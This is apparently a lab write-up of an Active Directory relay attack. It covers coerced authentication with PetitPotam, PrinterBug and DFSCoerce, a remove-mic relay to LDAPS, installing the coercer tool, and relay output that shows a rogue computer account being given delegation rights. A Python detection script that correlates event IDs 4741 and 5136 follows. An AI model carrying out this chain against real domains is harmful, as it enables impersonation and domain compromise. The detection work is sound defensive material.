We can coerce a connection from Baltimore DC to our host using multiple methods (PetitPotam, PrinterBug, DFSCoerce). To force a coercion without choosing between the different methods, we can use the all-in-one tool that just came out.
As explained beautifully in the hackndo blog and in The Hacker Recipes, you can’t relay an SMB connection to an LDAP(S) connection without using CVE-2019-1040, a.k.a. remove-mic.
Start the relay with remove-mic to the LDAPS of baltimore.maryland.local.
Run the coerced authentication on Salisbury (Salisbury is an up-to-date Windows Server 2016, so unauthenticated PetitPotam will not work here).
Installation
You can now install it from PyPI (latest version is ) with this command:
sudo python3 -m pip install coercer
Collecting coercer
Downloading coercer-2.4-py3-none-any.whl (49 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy
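Seen from the domain controller, the relay output above corresponds to a machine account creating a new computer account and then having the delegation attribute on its own object rewritten. The following detection sketch is an added example, not part of the original write-up or of any tool it uses; the event records are constructed, and their flat dictionary shape and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=10)  # assumption: correlation window, tune per site

# Constructed sample events, not real logs. IDs and field names follow Windows
# Security events 4741 and 5136; the flat dict shape is an assumption.
EVENTS = [
    {"id": 4741, "time": "2023-01-10T10:00:05", "SubjectUserName": "SALISBURY$",
     "TargetUserName": "removemiccomputer$"},
    {"id": 5136, "time": "2023-01-10T10:00:06", "SubjectUserName": "SALISBURY$",
     "ObjectDN": "CN=SALISBURY,CN=Computers,DC=maryland,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"id": 4741, "time": "2023-01-10T11:30:00", "SubjectUserName": "helpdesk.admin",
     "TargetUserName": "WKS042$"},
    {"id": 5136, "time": "2023-01-10T12:00:00", "SubjectUserName": "helpdesk.admin",
     "ObjectDN": "CN=WKS042,CN=Computers,DC=maryland,DC=local",
     "AttributeLDAPDisplayName": "description"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_relayed_rbcd(events, window=WINDOW):
    """Alert when a machine account creates a computer account (4741) and,
    within `window`, the RBCD attribute on its own object is written (5136)."""
    created = [e for e in events
               if e["id"] == 4741 and e["SubjectUserName"].endswith("$")]
    rbcd = [e for e in events
            if e["id"] == 5136 and e.get("AttributeLDAPDisplayName") == RBCD_ATTR]
    alerts = []
    for c in created:
        actor = c["SubjectUserName"].lower()
        for m in rbcd:
            # First RDN of the modified object, e.g. "SALISBURY"
            cn = m["ObjectDN"].split(",")[0].split("=", 1)[1].lower()
            if (m["SubjectUserName"].lower() == actor
                    and cn == actor.rstrip("$")
                    and abs(_ts(m) - _ts(c)) <= window):
                alerts.append({"actor": c["SubjectUserName"],
                               "new_computer": c["TargetUserName"],
                               "modified_object": m["ObjectDN"]})
    return alerts


if __name__ == "__main__":
    for alert in find_relayed_rbcd(EVENTS):
        print("possible relayed RBCD setup:", alert)
```

The helpdesk events in the sample are there to show that an administrator creating a workstation account and editing an unrelated attribute does not trigger the rule.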